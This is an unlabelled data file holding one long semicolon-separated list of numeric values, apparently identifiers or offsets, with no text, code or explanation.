34845;36006;29465;27272;64908;62061;63021;27273;29466;34739;34740;41523;39514;39433;49858;27274;29467;34982;34968;57313;29468;29469;29470;34024;32049;41524;41525;41967;49859;49860;42929;49861;43859;59119;49862;51339;52632;57204;57203;53893;56006;57205;57683;59493;62116;62961;65546;66196;66856;69092;27275;29471;27276;29472;29473;27511;31771;31772;34035;34036;27277;41526;29474;29475;29476;32050;34072;34200;34485;41527;41528;41529;49863;49864;43822;50968;53235;57206;55757;52737;57207;57208;62177;59064;65599;66197;62962;66857;69093;27278;27279;27280;30195;27512;34037;31773;35305;36070;42006;51750;42007;57209;52752;55622;57210;57658;59065;62381;63092;66198;65570;66618;69072;30248;27513;32178;31774;35306;34038;42008;36071;51751;52068;27281;57211;27282;35331;61567;27283;27284;29477;27285;27286;29478;38645;41530;51113;29479;27287;29480;27288;28204;29481;49865;42816;29482;27289;29483;30038;30039;32179;49866;43057;32180;51089;41531;51364;36710;29484;59120;59121;29485;27290;27291;59122;29486;27292;27293;27294;27295;29487;27296;59123;29488;59124;27297;27298;27299;28172;29489;59125;29880;29248;30142;30249;59126;30143;30144;30250;31089;31090;41532;59127;33252;33253;59128;33432;41533;41534;59129;59130;34331;59131;59132;41535;34457;59133;41536;35026;59134;35446;34755;41537;59135;41538;59136;59137;41539;59138;39335;42009;41540;41541;59139;42465;59140;49867;59141;49868;59142;43398;59143;59144;49869;44398;59145;59146;49870;59147;46252;59148;49871;49872;59149;59150;49873;59151;49874;59152;51158;59153;51752;59154;52971;59156;59155;57212;55468;59157;55504;59158;57213;59159;56607;59160;57214;59161;57659;59522;59521;62675;62676;65959;65960;66782;66781;29490;59162;27300;27301;27302;29786;32051;34239;27303;27304;28173;36202;27305;27306;35973;29491;27307;27308;29492;27309;29493;27310;29494;27311;29495;29991;29992;31623;31624;36122;41542;44093;49875;51159;49876;68877;57431;27312;29496;27313;29497;27314;29498;34780;27315;42010;41543;49877;42236;42323;55566;57215;27316;31401;34718;31402;31403;42011;42012;67223;27317;27318;29499;29958;29957;60103;27319;29500;27320;29959;29960;29787;34509;27321;27322;27323;28174;42013;34679;49878;57216;55433;29501;27324;57217;55434;29502;27325;51753;51754;29503;27326;29504;28175;41544;36007;42014;35759;41545;49879;29505;27327;30180;33885;35248;42015;35447;42324;29506;29344;45003;49880;34073;42325;34261;27328;38662;27531;35459;38646;38923;39445;63072;63680;27329;29507;27330;29508;27331;29509;28326;32024;32052;35553;41546;35733;35748;41547;41548;42016;41549;49881;49882;55897;57218;58167;59494;61547;50821;28205;27332;30015;57219;58577;62781;28176;52738;29510;34486;29881;29851;41550;36080;42017;55746;57220;33786;35027;38950;29511;27333;41551;27334;29512;34074;34075;41552;41553;49883;52990;53591;57221;58777;60077;60152;64093;66465;35678;42018;42019;43634;49884;41554;36182;35607;49885;55850;57222;29513;27606;27335;29514;32473;32474;58196;49886;29515;27336;38788;51755;27337;34025;27338;30093;36203;42020;30094;51756;30095;34207;34208;41555;34846;34847;34983;35320;41556;35699;41557;42021;50969;55698;57223;57684;59163;59722;62003;63259;33195;66301;33196;34076;34077;60104;58616;66290;32077;27339;27340;27341;32129;31775;34812;27342;27343;54829;57224;34984;29516;29517;29518;27344;29519;34026;57225;33939;53639;27345;29520;27347;27346;35679;42022;27348;27349;29521;27351;27350;30181;31637;33513;33837;33838;36008;35448;36204;42190;42421;45499;49895;50489;29522;27352;49896;57226;31696;31697;32025;31991;32026;34367;34960;35307;42366;49898;49897;43399;44381;49899;49900;44911;49901;45500;52652;53236;57227;57228;53650;33386;33387;41558;27353;27355;27354;29523;41559;42023;42959;49902;27356;27357;29524;27358;27359;29525;30182;33886;34985;34765;41560;45107;49903;50021;32116;32117;42024;41561;55687;57229;64927;28356;29526;27360;34027;57230;53447;29527;49904;56610;57231;35039;27361;51757;42303;49905;29882;29528;29883;33787;35460;60060;41562;41563;35646;66553;41564;29529;30016;29961;51758;35680;42025;51759;29531;29530;57232;56611;30196;30197;63345;62004;29532;66230;27532;27362;29533;42026;29534;41565;29962;29535;28327;27363;29536;32078;32079;34440;34441;41566;49906;49907;34487;29537;27364;34468;34078;34262;41567;35681;41568;41569;50842;27365;29538;27366;29539;27589;29540;31841;31842;31843;34321;61695;27367;29541;27368;29542;27369;29543;27370;29544;29545;41570;41571;41572;41573;42841;49908;45385;49909;50610;57233;53640;57234;55139;57235;56612;57570;58033;58679;59237;59316;65719;49910;44132;56613;57236;32454;41574;36116;41575;42027;41576;42028;57237;67199;33088;27371;27373;27372;27374;27375;27376;27377;27378;27533;29884;31309;31844;33224;33574;34039;34458;34469;34687;35957;35249;42029;57238;35784;55716;27379;39361;31776;27380;57239;56701;35006;35007;27381;29546;34263;41577;34264;35736;27382;49911;33162;44593;45540;49912;28283;29547;28284;28285;29548;29885;29886;29549;31091;33433;49913;51845;27383;27384;28177;27385;27386;33089;33887;35028;33090;29550;28286;34040;34041;49914;51641;57240;53894;65249;39499;39434;43086;49915;27387;29551;31339;31340;34692;27388;27389;27390;27391;27392;29552;27393;27394;27395;27396;27397;31455;31456;34813;35449;36081;42326;29887;35682;35923;29553;27398;27399;29554;29555;28178;32118;32119;41578;42030;49916;43621;65785;49917;57241;56702;59164;59984;29556;33888;33897;34240;49918;53531;57242;57243;53855;27400;29557;27401;29558;30251;30198;30199;41579;36169;41643;42031;49919;44056;49920;49921;50043;53237;57244;59384;62545;41580;27403;27402;27404;35785;27405;57245;53318;54830;57246;56614;29559;57247;27407;27406;27408;29560;30145;30146;33924;33923;41581;49922;35332;51642;57248;54643;58891;59308;38713;27409;43349;33163;49923;29561;36082;27410;29562;27412;27411;29563;27413;29565;29564;29566;27414;27416;27415;29567;27417;41582;39418;50822;53255;56615;57249;59393;57250;61771;57251;27418;29568;33898;33889;57252;27419;34986;41583;29569;27420;29789;29790;29570;32120;27421;27422;29571;29572;29573;27423;28328;34028;51760;34020;57253;42032;65799;69118;34987;28371;28206;34988;28225;27424;34042;27425;29574;27426;29575;27427;27429;27428;29576;27430;27431;27432;31457;29577;32181;35647;27433;29578;27434;27435;27436;27437;27438;27439;27440;27441;27442;27443;27444;27573;29695;27581;29888;31113;31845;31114;32027;34201;34360;34961;35250;39462;27445;42327;27446;29579;44935;49924;31458;31777;42033;27447;27448;59830;29580;27449;27450;27451;33434;29581;29582;27452;29823;27453;29824;32182;32183;41584;49925;45132;64866;27454;27455;27456;27457;27458;34814;34848;35040;35184;35598;38776;42034;42035;27459;29583;41585;41586;41587;41588;41589;49926;59355;69055;36049;41590;42036;33216;35472;45015;49927;59288;66466;51447;27460;27461;34241;57872;29584;27607;59523;59524;27462;29585;27463;27464;29586;27465;29587;49928;27466;29588;29889;29890;51761;29589;27467;32184;55505;57254;27468;29590;27469;31846;31847;33122;33123;28287;27470;29591;27471;29592;31298;31674;31675;34154;34155;34499;34442;41591;41592;49929;45472;46170;49930;52525;56035;57255;56616;57256;57843;64431;31698;33435;34168;41593;42037;41594;27472;27473;29593;31676;31699;41595;27514;57257;53256;34249;51762;51763;34989;33788;42328;27474;57258;55021;35683;33091;33092;57259;51764;53828;34079;57260;27475;29594;49931;41597;41596;41598;27476;42038;27477;30050;27478;31404;31778;34047;34990;35272;35729;38924;42039;42070;57261;53319;57262;54995;56617;57263;57264;58117;58945;59723;64797;62097;66255;69169;27479;29595;27480;31115;30096;42040;51765;32441;32502;27481;51766;57265;56618;59469;62025;62963;27482;29596;28207;29891;29791;29792;29963;57266;57267;63153;42041;41599;30097;27483;29597;31780;31779;34302;34303;30098;30099;30100;31459;31460;31716;31723;31782;31781;32392;32393;51767;51768;35599;51769;51770;38846;27484;29598;27485;27486;29599;27487;27488;29600;29601;27489;27490;29602;27491;34234;35723;41600;38847;41601;49932;43365;29603;49933;57268;53404;57269;58143;67256;30017;30040;30101;30102;33164;30103;30104;33165;49934;27492;30041;29604;27493;27494;29605;29606;27495;27496;29607;33166;66803;27497;29608;27498;28179;29609;41602;38182;42042;41603;42422;42406;51365;49935;27499;52163;29610;27500;29611;33101;33742;33743;27501;29612;27502;41604;35369;34991;34962;41605;29613;28180;56619;57270;57299;27503;27504;27505;33951;33821;47152;10273;26926;10590;13660;10493;14369;30133;77606;25927;25926;70971;70972;70973;70974;70975;70976;70977;70978;70979;70980;17162;17161;67172;67007;19218;70970;67006;69171;54618;54616;54617;50704;17163;132057;10274;78011;78012;78013;78014;80860;44959;51813;69262;69261;22226;25707;55115;69263;55116;30211;22419;125636;125637;125633;125551;125550;125310;131765;125311;73947;80911;73946;76362;138209;76361;151469;76403;81549;81550;81547;81551;135297;81552;137827;81548;31858;67002;62925;81600;77406;81599;69307;77404;103195;103837;126625;72513;89871;81179;88903;112155;91124;103839;104573;125372;72512;126626;71993;77050;90199;91895;93717;91125;96045;97661;100593;104459;136619;119616;110778;119617;124768;131233;133675;96046;151470;59367;59366;73964;66927;87505;57766;57767;59365;71994;72542;79083;84368;85256;85351;86873;90200;136620;91894;133676;151468;88598;69803;141082;56412;58514;56413;62458;25490;25491;62716;62715;50432;52052;56378;45017;45018;50433;51190;53209;59757;73275;53208;59192;59193;124697;104972;102203;59835;59834;59836;62009;102204;62010;63066;73690;90919;91896;93653;101158;102528;105509;117614;125373;126780;132098;32133;57796;57795;58204;57859;93344;93345;93654;93655;93409;93408;93658;105779;109035;128303;128329;106399;125357;121254;128417;124568;25458;38653;31857;21271;67229;42083;92757;92840;67003;68936;67004;68935;91915;93652;133410;130630;47046;56666;63067;91261;60161;55627;59208;61435;61436;86150;55628;55629;59209;69179;72480;76144;80118;92001;94052;59097;59210;74152;93346;25445;25446;74153;83117;72219;31726;31725;14298;14299;14323;16387;14300;72218;46818;46819;62813;33811;142226;53620;105300;142225;46733;110556;21217;11657;21218;49659;49658;72342;72343;72344;72345;72341;72346;72347;93560;19417;21237;10275;63418;45545;109552;11495;22478;13852;46224;46223;46225;47163;35308;10276;12216;18164;10443;12213;25220;11618;94675;151791;50603;35724;93440;135706;135707;135708;135709;49175;49176;52716;52715;105074;121245;10279;10584;20316;15707;11927;107096;101159;135970;101160;10280;42263;72831;51890;136890;57462;10281;142639;46203;46202;62776;99595;136090;58232;58231;131081;100574;100573;102274;125882;137757;142054;147895;148392;150797;151134;153159;140918;131726;23972;10709;10282;11610;43101;77302;77301;19608;11400;11401;11451;11660;10283;10284;19507;17342;17341;19508;19509;54986;19510;23650;20755;18263;11819;18262;18264;18493;58385;35820;46784;11914;155964;23780;155965;32443;10285;121621;10286;10523;14229;11576;14729;25199;78390;78391;78393;78392;78394;73339;78389;35702;71881;20185;71882;46737;27575;26968;22303;29799;46736;14364;16229;49706;14359;61733;15709;25954;15891;25953;39563;12003;56735;10596;40493;76255;11894;34434;14659;14591;20813;80479;80480;70139;70138;62574;58815;58816;54943;58814;66256;74369;53625;47901;58813;80481;54924;80482;54987;48363;55817;70126;86317;88090;100422;14191;20903;58528;58529;58389;11434;86318;86323;87822;70587;64568;72203;77528;77529;81813;91981;96484;100157;64569;64567;86325;81814;86326;86324;87823;93127;97141;104743;121010;136318;138330;86327;60016;80035;55593;57062;57765;18178;57764;11059;20168;19758;34361;150937;150946;150938;150936;150935;154151;157124;150856;151504;151502;151501;154149;50448;50526;157120;50475;49702;47029;17726;47030;46867;47715;47028;46868;51059;17727;47576;51957;56301;57540;121112;62986;121113;17728;47578;47577;104358;48255;51975;56008;57080;62987;66426;72690;81579;74245;83490;81649;88935;121114;46869;136770;138851;148405;147163;52634;54301;53323;121115;55759;55859;56070;57082;57541;62985;62988;63200;66427;51958;66428;121116;51526;72692;72691;74246;74247;77475;81650;83764;51976;83526;121117;121118;88936;121119;121120;102587;51987;103329;103782;106710;106975;121121;111066;118035;124064;121122;81651;77476;83765;83527;72693;121123;88937;99367;102588;103697;106711;74248;106976;121124;111067;74249;81580;99361;99368;100681;103698;102589;106712;106977;111068;118036;124063;126125;132413;94578;132418;136807;138097;138574;144054;147019;152183;154147;95438;96003;157119;99362;102590;121125;103699;118037;126312;124058;106713;126245;132419;136806;138098;138591;133845;141446;147164;144050;152182;106978;154150;122447;111069;157117;10477;11438;11150;39446;46753;50688;47696;47708;17322;49701;50347;34970;10807;43623;105006;39447;26070;35806;25289;25995;12085;10478;25525;11176;12123;11218;47749;33866;44314;39479;90318;54990;94251;26026;59356;15904;15924;14615;50418;42054;42423;46193;51972;42424;130590;43160;44967;39465;51528;44136;39466;47831;55903;46194;39467;46195;40406;42055;39468;49067;47830;33817;56242;56243;56244;42056;42872;47832;42425;51529;52483;50494;47834;39469;55904;48926;48927;11139;42479;42426;42427;51973;39470;44134;46196;56245;40927;40926;117861;117860;20252;33271;10287;17160;10491;19596;42210;62891;62892;137703;138614;137702;134892;138615;91428;149094;154960;17213;110766;134871;93483;97225;97224;93482;62628;52044;99730;20401;135408;135409;66811;135410;55455;55456;11747;35649;35648;139030;133361;82591;104273;99248;144585;148336;139031;82592;52653;34050;133269;134629;149064;154962;133217;103968;25625;34216;34362;103969;34490;22048;34363;35451;50831;24683;133623;25171;154351;158648;24679;25172;29724;154350;16192;24680;25925;107224;107225;84007;104354;84008;84009;24690;100618;100619;84918;84917;24682;27583;49707;58580;24681;24815;154961;134452;134302;148428;139667;139668;58597;32400;35042;25120;25148;25547;25757;17611;11428;14686;12076;10501;10288;10743;44875;33445;44874;73518;11157;11582;18405;12234;137053;10696;11636;11615;137054;45083;11136;43877;69421;14719;14793;14784;34432;63399;38888;64876;82898;22123;19941;22362;17210;34031;20068;19704;138510;35743;138385;57394;138890;138852;138797;138612;138796;138613;138611;138381;138599;138379;44118;11284;44117;35655;81575;17272;48239;23933;24900;11097;12075;14706;14707;20012;14699;21618;17315;17316;22480;18098;15561;21605;15951;72580;72579;156441;100961;103875;20484;20485;20486;50044;49791;49803;49804;49805;49995;100962;50045;50081;50046;50300;50319;50301;50524;50318;51501;20487;50378;50410;50411;50412;50490;50491;50559;50492;50560;50649;50573;20488;51114;51115;50823;50824;50843;50857;51184;50970;51073;51075;51074;51076;20489;51116;51117;51340;51136;51421;51433;51434;51435;51436;20490;51437;51453;51502;51525;51509;51572;51583;51584;51643;51668;51669;52526;52579;20491;52527;51673;51771;51846;51848;51847;51858;51870;51871;51900;20492;51954;65098;51985;51986;51996;51997;52022;52023;52069;52070;20493;52164;52474;52475;52476;52477;52478;52479;52480;52498;65099;65100;20494;52499;52528;52500;52529;52580;65101;52581;52667;52598;65102;52682;52739;20495;52740;52972;52991;53218;65103;53219;53220;53221;53222;53238;20496;20497;53257;53287;53295;53294;53296;53303;53320;53321;53372;53408;55067;20498;55068;55069;55070;55071;55072;55073;55074;55075;55076;55077;20499;55078;55080;55079;55081;55082;55083;55084;55085;55086;55087;55089;55088;20500;55090;55091;55092;55093;55094;55095;55096;55098;55097;55100;55099;55101;20501;20502;55102;55103;55105;55104;55106;55107;55108;55109;55113;55114;55407;20503;55469;55163;55605;55168;55167;55282;55172;55283;55408;55409;55413;55414;20504;55589;55454;55590;55522;55521;55530;55531;55567;55591;55606;55592;20505;55637;55607;55688;55648;55689;55699;55700;55717;55718;55729;20506;55730;55731;55758;55762;55921;55982;55784;55810;55785;55922;20507;55857;55858;55898;55899;56562;55923;55957;55967;55968;56036;56089;56115;56139;56140;56279;58511;58532;56048;20508;20509;56161;56189;56191;56190;56193;56192;56206;56194;56236;56207;56237;20510;56330;56256;56331;56257;56280;56281;56332;56305;56344;56343;20511;56345;56346;56347;56375;56387;56406;56384;56389;56388;56390;56466;56479;56506;20512;56507;56555;56554;56563;56580;56581;56556;56582;56583;56629;56630;56637;56638;20514;20513;56639;56640;56641;56642;56643;56644;56646;56645;56664;56647;20515;56680;56775;56746;57393;56747;56767;56776;56768;56777;56778;20516;56817;56853;56854;56860;57685;56868;56861;56869;56870;56911;56943;56912;20517;56913;56914;56916;56915;56919;56944;56945;56946;56947;20518;56948;56949;56969;56917;56970;56971;57997;57005;56978;57024;57038;57047;20519;57048;57055;57056;57057;57059;57058;57061;57060;57271;57300;20520;20521;57301;57302;57303;57304;57305;57306;57457;57458;57314;57315;57321;20522;57341;57342;57343;57344;57345;57357;57370;57436;57447;57448;20523;57449;57467;57495;57496;57497;57498;57532;57533;20524;57534;57535;57588;57615;57616;57660;57661;57662;20525;57663;57664;57665;57697;57686;57687;57688;57698;57689;57707;57706;20526;57873;57762;57763;57790;57874;57844;57845;57856;57846;57887;57888;57933;57932;20527;20528;57934;57935;57936;57937;57938;57958;57973;57998;58034;58035;58036;57999;58037;20529;58104;58069;58118;58130;58131;58179;58144;58145;58168;58146;58169;20530;58170;58197;58264;58223;58266;58265;58267;58268;58269;58270;20531;58271;58287;58288;58289;58301;58318;58325;58326;58340;58341;20533;20532;58384;58383;58425;58589;58397;58807;58481;58443;58492;58444;58493;58494;58495;58496;58497;20534;58498;58499;58534;58533;58590;58578;58617;58600;58680;58618;20535;58723;58742;58741;58743;58808;58871;58870;58872;58873;58892;20536;58922;58923;59015;59470;63107;58946;59032;58947;58948;58964;58974;59016;58986;59033;20537;59034;59107;59170;59186;59364;59187;59188;59225;59226;59238;20538;20539;59254;59289;59290;59291;59292;59309;59320;59321;59322;59323;20540;59324;59385;59386;59394;59525;59640;59654;59724;59395;59725;59396;59397;59398;59399;59471;59452;59472;59473;20541;20542;59474;59475;59476;59495;59496;59526;59553;59554;59565;59566;20543;59567;59603;59604;61568;59605;59754;59755;59784;59783;59810;59809;59811;59812;20545;20544;20546;59813;59814;59815;59816;59831;59832;59833;59845;59856;59891;20547;20548;59954;59903;59956;59955;59957;59964;61729;59985;59965;59986;60012;60013;20549;20550;20551;20552;60014;60078;60079;60105;61506;60106;60125;60126;60136;60137;20553;61379;61380;61411;61445;61458;61483;61485;61484;62036;61507;20554;61508;61509;61510;61511;61512;61513;61525;61526;61548;61549;20555;61569;61619;61570;61607;61608;61642;61643;61706;61707;61730;62062;20557;20556;20558;61745;61772;62382;61773;61787;61788;62005;62007;62037;62006;20559;62039;62038;62040;62041;62072;62073;62098;62111;62112;62178;20561;20560;62179;62180;62199;62211;62200;62212;62219;62434;62238;62239;62240;20562;62241;62290;62306;62307;62347;62348;62365;62366;62387;62388;63285;20563;62408;62409;62411;62410;62430;62435;62436;62474;62437;62475;20564;20565;20566;62476;62495;62496;62497;62660;62511;62512;62513;62515;62514;62546;20567;62547;62548;62557;62619;62620;62677;62661;62700;62707;62708;62709;20568;62733;62756;62816;62815;62818;62817;62860;62868;62888;62869;62870;62899;62900;20569;62936;62937;62982;62983;63022;63023;63024;63025;63026;63145;63027;20570;63058;63093;63108;63109;63116;63117;63118;63119;63121;63120;20571;63122;63123;63124;63154;63163;63164;63184;63165;63219;63220;20572;63221;63222;63260;63261;63262;63264;63286;63287;63288;63296;63297;20573;63299;63298;63316;63315;63317;63320;63322;63321;63367;20574;63448;63447;63665;63467;64480;63474;63475;63535;63536;63537;63538;63539;63540;20575;63541;63608;63611;63609;63612;63613;63614;64432;64433;63615;64434;20576;63616;20577;64435;63666;63667;63668;63669;64436;64283;64284;64285;64289;64290;64291;20578;64375;64376;64481;64482;64615;64616;64617;20579;64618;64629;64619;64638;64639;64640;64641;64680;64681;64698;64967;20580;20581;20582;20583;64782;64783;64798;64968;65684;64799;64800;64801;64802;64803;64804;64805;20584;64806;64807;64808;64809;64810;64811;64890;64891;64892;64909;20585;64910;64911;64928;64929;64969;65045;65095;65077;65096;65250;65104;65251;20586;65252;65547;65571;65573;65572;65574;65608;65607;65609;65610;65611;20587;65629;65640;65641;65655;65666;65667;65685;65686;20588;65730;65763;65786;65787;65817;65816;65788;65800;20589;65818;65819;65867;65868;65869;65870;65871;65872;65923;20590;20591;20760;65980;65981;66022;65994;66032;66199;66171;66200;66215;66231;66232;66291;20592;66292;66302;66303;66314;66346;66347;66348;20593;66357;66372;66442;66443;66467;66468;66469;66470;66471;66494;20594;66495;66496;66669;66540;66587;66588;66589;66590;20595;66670;66691;66692;66712;66713;66714;66715;66716;20596;66783;66816;66817;66818;66819;66820;66821;66822;66823;20597;20598;66824;66825;66826;66827;66828;66829;66830;66831;66832;66833;20599;66834;66877;66858;66892;66886;66893;66901;66900;20600;66902;66904;66903;66922;66923;66924;66960;66962;66961;20601;67000;67186;67001;67015;67138;67016;67187;67139;67188;67189;20602;67190;20603;20604;67206;67191;67224;68902;68903;68957;68923;68924;68925;68926;69073;69031;69119;20605;69120;69173;69121;69122;69123;69124;69125;69126;69127;20606;69174;69175;69234;69235;69260;69366;69367;69373;69415;20607;69416;69417;69418;69419;69797;69798;69807;20608;20761;69808;69809;69810;69811;69824;69812;69843;20609;69862;69947;69970;69971;69973;69972;69974;69975;69976;69977;20610;69978;69979;69980;69981;70086;70087;70116;70117;70190;20611;70191;70192;70193;70194;70251;70252;70253;70254;70255;20612;70256;70266;70267;70268;70269;70270;70366;70367;70452;20613;70492;70539;70538;70540;70541;70542;70543;20614;20615;20616;70580;70579;70582;70581;70584;70583;70606;70607;70608;70698;20617;70725;70759;70782;70783;70798;70799;70800;70801;70802;20618;70803;70804;70805;70844;70845;70874;70875;70876;20619;70962;71021;71036;71037;71094;71139;71203;71204;71205;20620;71206;71207;71208;71209;71211;71210;71244;71253;71260;20621;71309;71374;71375;71376;71394;71493;71518;71531;71532;20623;20622;71563;71564;71565;71615;71791;71792;71793;71795;71794;20624;71796;71797;71798;71799;71837;71895;71855;71896;20625;71938;71990;71939;72005;72087;72088;72089;72115;72116;20626;72117;72164;72230;72231;72232;72234;72233;72235;72278;72326;72502;72366;20627;20628;72386;72424;72425;72457;72598;72479;72571;72503;72572;72573;20629;72575;72574;72576;72577;72578;20630;72599;72682;72719;72701;72720;72740;73398;72799;72798;72812;72858;72857;20631;72874;72875;72897;72876;72898;72900;72899;72901;20632;72902;72925;72978;72979;72980;73016;73017;73076;73077;73078;20633;73148;73092;73180;73179;73181;73202;73245;73223;73316;73288;20634;73328;73399;73329;73400;73401;73402;73513;73556;73514;73665;73666;20635;73680;73681;73709;73722;73723;73724;73725;73726;73727;73728;20636;73752;73753;73820;73785;73799;73786;73800;73801;73802;65105;73803;73821;73822;73882;73883;73884;73885;73887;73886;20637;73888;73889;20762;73890;73891;73892;73893;73902;73903;73904;73905;73906;73940;20763;73941;74022;74023;74034;74035;74420;76107;74134;74135;74136;74137;74182;20764;20765;74183;74184;74185;74211;74212;74213;74214;74285;74215;20766;74322;74508;74353;76199;77245;74354;74355;74356;74357;74358;74359;20767;74360;74361;74464;74494;74493;74509;76108;76109;76142;76143;20768;76158;76159;76160;76200;76201;76249;76250;76251;76276;76275;76294;20769;76295;76296;76297;76298;76354;76379;76378;76380;76381;20770;76382;76383;76385;76384;76386;76451;76425;76524;76525;76559;76560;20771;76561;76563;76562;76564;76565;76566;76568;76567;20772;76569;76586;76682;76587;76704;76705;76706;76707;76756;20638;76757;20773;20774;76784;76935;76785;76961;76962;76991;77019;76999;77568;77049;77085;77146;20775;77148;77147;77320;77198;77181;77199;77218;77219;77237;77236;77274;77387;77724;77300;20776;77321;77322;77323;77324;77325;77485;77420;77436;77486;20777;77664;77487;77488;77489;77490;77492;77491;77526;77525;77527;20778;77555;77569;77601;77570;77602;78465;77701;77725;77726;77744;20779;20780;77808;77807;77816;77809;77817;77818;77820;77819;77821;20781;77851;20782;77853;77852;77854;77897;77898;77961;77982;78010;78040;78041;78042;20783;78106;78107;78466;78504;78255;78256;78257;78258;78259;20784;20785;78260;78261;78467;78468;78505;78538;78539;78653;78654;78668;78698;20786;78723;78761;78762;78763;78764;78765;78821;78869;78888;79119;20639;20787;79120;79121;79122;79209;79210;79211;79212;79213;79214;20788;79244;79354;79333;79383;79382;79430;79431;79432;79433;20789;79434;79435;79436;79576;79598;79621;79688;79622;79623;79659;79716;20790;79689;79717;79740;79741;79718;79824;79823;79825;79852;79853;79854;80025;80026;20791;80027;80028;80029;80030;80031;80032;80033;80167;80034;80218;80168;20792;80391;80392;80410;80411;80412;80441;80413;80548;80549;80471;81041;21054;80851;80472;80473;80474;80510;80511;80512;80513;80514;80515;80516;81177;21055;80517;80550;80551;80552;80827;80826;81016;80852;80853;80854;21056;21057;80943;80944;80945;81017;81019;81018;81042;81043;81045;81144;81341;81162;21058;81163;81164;81165;81178;81296;81255;81256;81297;81314;20640;21059;81398;81399;81400;81412;81420;81544;81729;81644;81482;81483;81484;21060;81509;81566;81565;81567;81568;81645;81569;81646;81590;81570;81571;21071;81572;81573;81753;81668;81698;81754;81755;81756;81771;81772;81773;81774;81775;21061;81776;81879;81880;81881;81910;81950;81951;81971;82022;21062;82023;82069;82024;82070;82071;82072;82073;82074;82267;21063;82268;82471;82524;82497;82565;82526;82525;82642;82527;82643;82644;82659;21064;82660;82661;82662;82695;82696;82697;82765;82766;82847;82792;21065;83109;83086;82911;82991;82992;82993;83050;83051;83052;83110;83111;21066;83112;83134;83277;83176;83175;83177;83178;83180;83179;83181;83182;21067;83251;83252;83255;83256;83257;83258;83331;83259;83332;83260;83333;20641;21072;83261;83334;83262;83434;83544;83345;83344;83413;83414;83435;21068;83777;83758;83778;83760;83759;83761;83762;83779;83809;83861;83780;83810;21069;83811;83862;83863;83949;83950;83972;83989;83990;84045;84117;21070;84118;84119;84120;84121;84122;84123;84124;84125;84148;21182;84208;84316;84209;84317;84210;84318;84211;84319;84212;84213;84320;84214;84228;84229;21151;84230;84339;84487;84428;84429;84430;84664;84794;84444;84563;84564;21183;84612;84613;84614;84616;84615;84618;84617;84619;84620;21184;84635;84665;84666;84900;84915;84957;84958;85240;84980;21204;84981;84982;84983;84984;84985;84986;85042;85075;85076;85077;21216;85078;85079;85080;85081;85122;85123;85155;85154;85156;85157;21234;20642;85158;85159;85345;85344;85251;85578;85252;85253;85297;85265;85444;86400;85445;21270;85533;85506;85648;85507;85508;85509;85510;85511;85512;21291;85534;85579;85660;85682;85683;85684;85724;85735;85765;85797;21292;85798;85799;85800;85801;85872;85873;85874;85875;85907;21300;21568;85982;85983;85984;86102;86103;86144;86291;86145;86146;86147;86185;86189;86190;86204;21301;86205;86206;86207;86208;86218;86292;86293;86219;86220;86294;86244;86221;86295;21321;86296;86297;86298;86299;86310;86379;86443;86401;21371;86491;86415;86565;86416;86465;86466;86467;86492;86468;21372;86493;86494;86566;86629;86617;86650;86630;86651;86758;86652;86672;86720;86809;21373;86759;86760;86783;86784;86785;86786;86787;86788;86789;20643;21374;86810;86811;86812;86813;86814;86815;86816;86847;86848;86871;21375;86872;86896;86897;86944;86911;86993;87065;87066;87107;21376;87168;87108;87123;87169;87170;87203;87320;87205;87204;87216;87217;21377;87236;87237;87238;87239;87406;87369;87407;87408;87409;87462;87463;87464;21569;87466;87465;87468;87467;87470;87469;87497;87498;87499;87471;87529;87530;87531;87532;21588;87533;87535;87534;87536;87537;87755;88804;87756;87757;87758;87759;87761;87760;87915;21604;87774;87868;87814;87815;87816;87845;87846;87888;87916;87939;21612;88010;88011;88013;88012;88014;88015;88016;88017;88018;88019;88040;88455;88083;88084;27858;21613;27860;27859;88456;88637;88457;88409;88487;88516;88517;88518;88519;88520;88521;88522;88523;27861;88524;88525;88526;88576;88678;88711;88712;88861;88747;88748;88749;88750;88805;20644;27862;88806;88836;88837;88838;88928;89776;88929;88894;88895;88897;88896;88898;88899;89023;89024;88900;89025;27863;88901;88902;89026;88950;88930;88951;88952;88953;89078;89079;89732;89733;89100;89826;90421;89659;90598;89660;27864;89734;89865;89777;89778;89827;89828;89866;89930;89931;89932;27865;89933;89934;89935;89995;89936;89962;89937;89996;90822;90021;89997;90855;91255;90094;90095;90147;27866;90245;90188;90349;90306;90350;90400;90401;90402;90403;90404;90507;90405;27867;90406;90588;90824;90915;91256;90589;91333;90677;90825;90760;90678;90826;90827;90856;90857;90858;90887;27868;27869;90916;91257;90918;90917;91082;91083;91084;91085;91086;91087;91088;91090;91089;27870;27871;27872;91091;91092;91093;91094;91095;91258;91122;91181;91182;91183;91184;91185;91186;91187;91188;91189;91190;91191;27873;91218;91219;91220;91259;91320;91334;91341;91422;91423;91424;91425;27874;91451;91450;91498;91557;91499;91558;91559;91560;91561;20645;27875;20646;91562;91563;91564;91565;91566;91567;91568;91569;91725;91570;27876;91726;91728;91727;91758;91729;91914;91873;91874;91875;91876;91877;91878;91879;91880;91882;91881;91883;27877;91884;91893;92408;91954;91955;91956;91957;91968;92009;92010;27878;92011;92311;92033;92313;92312;92314;92315;92316;92317;92318;92319;92456;92409;27879;92511;92784;92583;92584;92785;92699;92750;92751;92966;92815;92860;27880;92861;92862;92863;92864;92865;92866;92867;93509;92868;27881;92869;92985;92999;93025;93045;93046;93047;93106;93107;93120;27882;93217;93241;93242;93243;93218;93219;93220;93398;93682;93399;93460;93683;93511;93510;27883;93559;93600;142021;93601;93602;93603;93604;93605;93606;93607;93648;93649;93684;93715;93773;93774;27884;93775;93827;93938;93800;93801;93809;93864;93896;93953;93954;93955;93956;93957;93958;93959;20647;27885;94044;94045;94068;94069;94152;94153;94154;94155;94156;94157;94159;94158;94249;94195;94287;27886;94288;94351;94352;94508;94289;94353;94464;94465;94466;94467;94468;27887;94509;94510;94573;94574;95025;94669;94730;94731;94732;94733;94734;94735;94736;94737;27888;27889;94954;95054;95053;95466;95284;95285;95371;95295;95318;95385;95386;27890;95425;95426;95427;97351;95428;95429;95430;95431;95432;95434;95433;95467;95566;27891;95567;95568;95569;95571;95570;95573;95572;95574;95661;95629;95807;96035;95808;95873;95949;95992;27892;95993;95994;95995;95996;95998;95997;95999;96000;96336;96304;96871;96406;96436;96437;96439;96438;96440;96441;27893;96442;96443;96444;96445;96483;96605;97852;96656;96872;97047;96719;96720;96763;96978;27894;96796;96927;97083;96952;96951;97853;96953;96954;96955;96980;96979;96981;97016;97017;27895;27896;97018;97098;97048;97049;97050;97084;97099;97208;97190;97221;97209;97301;102814;20648;27897;27898;97222;97223;97302;97303;97304;